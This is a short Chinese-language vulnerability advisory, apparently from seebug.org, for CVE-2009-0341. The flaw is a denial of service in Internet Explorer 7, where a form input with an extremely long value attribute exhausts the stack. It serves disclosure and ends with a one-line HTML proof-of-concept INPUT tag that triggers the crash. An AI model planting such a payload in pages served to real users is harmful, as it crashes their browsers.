Microsoft IE HTML表单值拒绝服务漏洞

2009-02-1300:00:00

Root

www.seebug.org

0.21 Low

EPSS

Percentile

96.4%

JSON

BUGTRAQ ID: 33494
CVE(CAN) ID: CVE-2009-0341

Internet Explorer是Windows操作系统中默认捆绑的WEB浏览器。

Internet Explorer的shell32模块没有正确地处理表单数据，如果用户受骗打开了网页中INPUT单元包含有超长的VALUE属性，就可能耗尽栈资源，导致浏览器拒绝服务。

Microsoft Internet Explorer 7.0
厂商补丁：

Microsoft

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

<a href=“http://www.microsoft.com/windows/ie/default.asp” target=“_blank”>http://www.microsoft.com/windows/ie/default.asp</a>


                                                &lt;INPUT type=&quot;text&quot; name=&quot;A&quot; value=&quot;CCCCCCCCCCCCCCCCCCCC(many thousands)”&gt;

0.21 Low

EPSS

Percentile

96.4%

JSON

Related for SSV:4749